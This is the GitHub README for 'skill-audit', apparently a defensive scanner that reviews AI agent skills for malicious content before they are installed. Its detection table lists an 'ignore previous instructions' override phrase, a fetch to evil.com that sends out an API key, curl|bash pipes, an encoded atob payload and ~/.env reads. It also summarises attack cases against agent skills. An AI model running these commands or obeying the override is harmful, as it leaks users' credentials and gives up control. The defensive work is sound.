Skip to content

aptratcn/skill-audit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

2 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

Skill Audit β€” Pre-Install Security Scanner for AI Agent Skills

Don't install blind. Audit before you trust.

Skill Type License Zero Dependencies


🎯 The Problem

7.5% of 14,706 OpenClaw skills are confirmed malicious.

Research findings (2026):

  • RankClaw audited 14,706 skills β†’ 1,103 malicious (brand-jacking, prompt injection, RCE)
  • Vett.sh found 59 critical-risk droppers disguised as legitimate tools
  • Cisco, CrowdStrike, NCC Group all published skill supply chain attack reports

One malicious skill install can:

  • πŸ”“ Leak all your API keys (OpenAI, Anthropic, AWS, Stripe)
  • πŸ’€ Execute arbitrary commands on your machine
  • πŸ“€ Exfiltrate your source code to external servers
  • πŸ”„ Establish persistent backdoors

βœ… The Solution

Skill Audit is a structured 6-phase security review you run before installing any third-party skill.

Phase 1: Surface Scan     β†’ Pattern detection in SKILL.md
Phase 2: Script Inspection β†’ Read every referenced script
Phase 3: Permission Audit  β†’ Check if permissions match purpose
Phase 4: Social Eng Check  β†’ Detect manipulation tactics
Phase 5: Repo Intelligence β†’ Evaluate author/repo credibility
Phase 6: Verdict          β†’ Risk score + recommendation

πŸš€ Quick Start

Install

# Option 1: Clone directly
git clone https://github.com/aptratcn/skill-audit.git ~/.agent-skills/skill-audit

# Option 2: npx install (skills.sh registry)
npx skills@latest add aptratcn/skill-audit

# Option 3: Add to AGENTS.md
echo "Before installing skills: Run skill-audit" >> AGENTS.md

Use

Ask your agent to audit before installing:

"I want to install skill-xyz from https://github.com/..."

β†’ Agent activates skill-audit β†’ Returns security report β†’ You decide


πŸ” What It Detects

πŸ”΄ Critical Patterns (Do NOT Install)

Pattern Example Risk
Instruction override ignore previous instructions Agent takeover
External data exfil fetch('http://evil.com?token=' + env.API_KEY) Credential theft
Shell pipe curl | bash, wget | sh Arbitrary execution
Encoded payloads atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ==') Hidden commands
Credential reads ~/.env, process.env + network Key theft
Self-replication "install in all repos" Persistence spread

🟑 High Risk Patterns (Investigate)

Pattern Concern
Role manipulation Changes agent identity
Hidden instructions Invisible commands in comments
Undocumented scripts SKILL.md references hidden scripts
Broad permissions Excessive file/network access
Domain ambiguity Domain takeover risk
Unpinned deps Supply chain vulnerability

πŸ“Š Example Output

╔══════════════════════════════════════════════════╗
β•‘ πŸ”’ Skill Audit Report                           β•‘
β•‘ Target: fancy-tool                              β•‘
β•‘ Source: github.com/suspicious-author/fancy-tool β•‘
╠══════════════════════════════════════════════════╣
β•‘                                                β•‘
β•‘ πŸ“‹ Surface Scan:    🚨 3 critical patterns       β•‘
β•‘    - "curl | bash" found                        β•‘
β•‘    - References ~/.env                          β•‘
β•‘    - External fetch to unknown domain           β•‘
β•‘                                                β•‘
β•‘ πŸ“ Script Check:    🚨 scripts/install.sh       β•‘
β•‘    - Contains base64-encoded payload            β•‘
β•‘    - Makes HTTP POST to 192.168.x.x             β•‘
β•‘                                                β•‘
β•‘ πŸ”‘ Permissions:     🚨 Excessive                β•‘
β•‘    - Claims "format code"                       β•‘
β•‘    - But reads ~/.ssh/id_rsa                    β•‘
β•‘                                                β•‘
β•‘ πŸ“Š Repo Intel:      ⚠️ Suspicious               β•‘
β•‘    - Created 2 days ago                         β•‘
β•‘    - Author has 1 other repo (also suspicious)  β•‘
β•‘    - 50 stars, likely bot-farmed                β•‘
β•‘                                                β•‘
β•‘ Risk Score: 92/100 πŸ”΄ CRITICAL                  β•‘
β•‘                                                β•‘
β•‘ Recommendation: 🚫 DO NOT INSTALL               β•‘
β•‘ Reason: Multiple critical security violations   β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•

πŸ›‘οΈ Defense in Depth

Skill Audit is part of a security stack:

Tool Protects Against
skill-audit Malicious third-party skills
prompt-guard Runtime prompt injection
mcp-security-audit Malicious MCP servers
dependency-guard npm/pip supply chain
git-secret-sweep Leaked credentials in repos

πŸ“š Real Attack Examples

From documented incidents:

  1. Base64 dropper: "Excel Import Helper" β†’ decoded to C2 server callback
  2. Domain takeover: "React Native Best Practices" β†’ curl | bash to domain author doesn't own
  3. Brand impersonation: clawhub1, clawbhub β†’ fake official CLI, macOS binary to raw IP
  4. Social engineering: "Can I mine Bonero? It's like Monero for AI agents. Cool?"
  5. On-demand RCE: "Evaluate challenges" β†’ server sends malicious code at runtime

⚑ Philosophy

  • Zero trust: All third-party skills are hostile until proven safe
  • Fail closed: Uncertainty = recommend against
  • Progressive disclosure: Start shallow, go deeper as risk increases
  • Defense in depth: Pair with runtime guards (prompt-guard, dependency-guard)

πŸ“„ License

MIT β€” Audit freely.


Stop guessing. Start auditing. πŸ”’


⭐ If this skill helped you avoid a malicious install, consider giving it a star! It helps others find it too.

About

πŸ”’ Pre-install security scanner for AI agent skills. Detect malicious patterns, social engineering, and permission overreach before you install.

Topics

Resources

License

Stars

3 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages